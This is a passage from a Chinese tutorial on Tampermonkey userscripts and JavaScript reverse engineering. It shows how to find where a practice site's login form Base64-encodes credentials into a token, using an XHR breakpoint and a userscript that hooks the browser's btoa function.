// @grant GM_setClipboard
// @grant unsafeWindow
// @grant window.close
// @grant window.focus

如果没有定义过 @grant 选项，Tampermonkey 会猜测所需要的函数使用情况。

@noframes：此标记使脚本在主页面上运行，但不会在 iframe 上运行。

@nocompat：由于部分代码可能是为专门的浏览器所写，通过此标记，Tampermonkey 会知道脚本可以运行的浏览器。

例如：

1	// @nocompat Chrome

这样就指定了脚本只在 Chrome 浏览器中运行。

除此之外，Tampermonkey 还定义了一些 API，使得我们可以方便地完成某个操作。

GM_log：将日志输出到控制台。
GM_setValue：将参数内容保存到 Storage 中。
GM_addValueChangeListener：为某个变量添加监听，当这个变量的值改变时，就会触发回调。
GM_xmlhttpRequest：发起 Ajax 请求。
GM_download：下载某个文件到磁盘。
GM_setClipboard：将某个内容保存到粘贴板。

还有很多其他的 API，大家可以到 https://www.tampermonkey.net/documentation.php 查看更多的内容。

在 UserScript Header 下方是 JavaScript 函数和调用的代码，其中 'use strict' 标明代码使用 JavaScript 的严格模式。在严格模式下，可以消除 Javascript 语法的一些不合理、不严谨之处，减少一些怪异行为，如不能直接使用未声明的变量，这样可以保证代码的运行安全，同时提高编译器的效率，提高运行速度。在下方 // Your code here... 处就可以编写自己的代码了。

6. 实战分析

下面我们通过一个简单的 JavaScript 逆向案例来演示一下如何实现 JavaScript 的 Hook 操作，轻松找到某个方法执行的位置，从而快速定位逆向入口。

接下来我们来看一个简单的网站：https://login1.scrape.center/，这个网站的结构非常简单，就是一个用户名密码登录。但是不同的是，点击登录的时候，表单提交 POST 的内容并不是单纯的用户名和密码，而是一个加密后的 token。

页面如图所示。

我们输入用户名密码，都为 admin，点击登录按钮，观察一下网络请求的变化。

可以看到如下结果如图所示。

我们不需要关心 Response 的结果和状态，主要看 Request 的内容就好了。

可以看到，点击登录按钮时，发起了了一个 POST 请求，内容为：

1	{"token":"eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiJ9"}

嗯，确实，没有诸如 username 和 password 的内容了，那怎么模拟登录呢？

模拟登录的前提当然就是找到当前 token 生成的逻辑了，那么问题来了，到底这个 token 和用户名、密码是什么关系呢？我们怎么来找寻其中的蛛丝马迹呢？

这里我们就可能思考了，本身输入的是用户名和密码，但提交的时候却变成了一个 token，经过观察并结合一些经验可以看出，token 的内容非常像 Base64 编码。这就代表，网站可能首先将用户名密码混为了一个新的字符串，然后经过了一次 Base64 编码，最后将其赋值为 token 来提交了。所以，初步观察我们可以得出这么多信息。

好，那就来验证一下吧！探究网站 JavaScript 代码里面是如何实现的。

首先我们看一下网站的源码，打开 Sources 面板，看起来都是 Webpack 打包之后的内容，经过了一些混淆，如图所示。

这么多混淆代码，总不能一点点扒着看吧？那么遇到这种情形，这怎么去找 token 的生成位置呢？

解决方法其实有两种，一种就是前文所讲的 Ajax 断点，另一种就是 Hook。

Ajax 断点

由于这个请求正好是一个 Ajax 请求，所以我们可以添加一个 XHR 断点监听，把 POST 的网址加到断点监听上面。在 Sources 面板右侧添加一个 XHR 断点，匹配内容就填当前域名就好了，如图所示。

这时候如果我们再次点击登录按钮，发起一次 Ajax 请求，就可以进入断点了，然后再看堆栈信息，就可以一步步找到编码的入口了。

再次点击登录按钮，页面就进入断点状态停下来了，结果如图所示。

一步步找，最后可以找到入口其实是在 onSubmit 方法那里。但实际上我们观察到，这里的断点的栈顶还包括了一些类似 async Promise 等无关的内容，而我们真正想找的是用户名和密码经过处理，再进行 Base64 编码的地方，这些请求的调用实际上和我们找寻的入口没有很大的关系。

另外，如果我们想找的入口位置并不伴随这一次 Ajax 请求，这个方法就没法用了。

所以下面我们再来看另一个方法 —— Hook。

Hook Function

所以这里介绍第二种可以快速定位入口的方法，那就是使用 Tampermonkey 自定义 JavaScript，实现某个 JavaScript 方法的 Hook。Hook 哪里呢？很明显，Hook Base64 编码的位置就好了。

那么这里就涉及一个小知识点：JavaScript 里面的 Base64 编码是怎么实现的？

没错，就是 btoa 方法，在 JavaScript 中该方法用于将字符串编码成 Base64 字符串，因此我们来 Hook btoa 方法就好了。

好，这里我们新建一个 Tampermonkey 脚本，内容如下：

// ==UserScript==
// @name         HookBase64
// @namespace    https://login1.scrape.center/
// @version      0.1
// @description  Hook Base64 encode function
// @author       Germey
// @match        https://login1.scrape.center/
// @grant        none
// ==/UserScript==
(function () {
  "use strict";
  function hook(object, attr) {
    var func = object[attr];
    object[attr] = function () {
      console.log("hooked", object, attr);
      var ret = func.apply(object, arguments);
      debugger;
      return ret;
    };
  }
  hook(window, "btoa");
})();

首先我们定义了一些 UserScript Header，包括 @name和@match等，这里比较重要的就是@name，表示脚本名称；另外一个就是 @match，它代表脚本生效的网址。

脚本的内容如上面代码所示。我们定义了一个 hook方法，传入 object 和 attr 参数，意思就是 Hook object 对象的 attr参数。例如我们如果想 Hook alert 方法，那就把 object 设置为 window，把 attr 设置为字符串 alert 。这里我们想要 Hook Base64 的编码方法，而在 JavaScript 中，Based64 编码是用 btoa 方法实现的，所以这里我们就只需要 Hook window 对象的 btoa 方法就好了。

那么 Hook 是怎么实现的呢？我们来看已下，首先一句 var func = object[attr]，相当于我们先把它赋值为一个变量，我们调用 func 方法就可以实现和原来相同的功能。接着，我们直接改写这个方法的定义，将 object[attr] 改写成一个新的方法，在新的方法中，通过 func.apply 方法又重新调用了原来的方法。这样我们就可以保证前后方法的执行效果是不受什么影响的，之前这个方法该干啥就还是干啥。

但是和之前不同的是，我们自定义方法之后，现在可以在 func 方法执行的前后，再加入自己的代码，如 console.log 将信息输出到控制台，debugger 进入断点等。在这个过程中，我们先临时保存下来了 func 方法，然后定义一个新的方法，接管程序控制权，在其中自定义我们想要的实现，同时在新的方法里面重新调回 func 方法，保证前后结果是不受影响的。所以，我们达到了在不影响原有方法效果的前提下，实现在方法前后自定义的功能，这就是 Hook 的过程。

最后，我们调用 hook 方法，传入 window 对象和 btoa 字符串，保存。

接下来刷新下页面，这时候我们就可以看到这个脚本在当前页面生效了，可以发现 Tempermonkey 插件面板提示了已经启用，同时在 Sources 面板下的 Page 选项卡可以观察到我们定义的 JavaScript 脚本被执行了，如图所示。

然后输入用户名、密码，点击提交，成功进入了断点模式停下来了，代码就卡在了我们自定义的 debugger 这一行代码的位置，如图所示。

成功 Hook 住了，这说明 JavaScript 代码在执行过程中调用到了 btoa 方法。

这时看一下控制台，如图所示。

这里也输出了 window 对象和 btoa 方法，验证正确。

这样，我们就顺利找到了 Base64 编码操作这个路口，然后看一下堆栈信息，也已经不会出现 async、Promise 这样的调用了，很清晰地呈现了 btoa 方法逐层调用的过程，非常清晰明了，如图所示。

另外再观察下 Local 面板，看看 arguments 变量是怎样的，如图所示。

可以说一目了然了，arguments 就是指传给 btoa 方法的参数，ret 就是 btoa 方法返回的结果，可以看到 arguments 就是 username 和 password 通过 JSON 序列化之后的字符串，经过 Base64 编码之后得到的值恰好就是 Ajax 请求参数 token 的值。

结果几乎也明了了，我们还可以通过调用栈找到 onSubmit 方法的处理源码：

onSubmit: function() {
  var e = c.encode(JSON.stringify(this.form));
  this.$http.post(a["a"].state.url.root, {
    token: e
  }).then((function(e) {
  	console.log("data", e)
  }))
}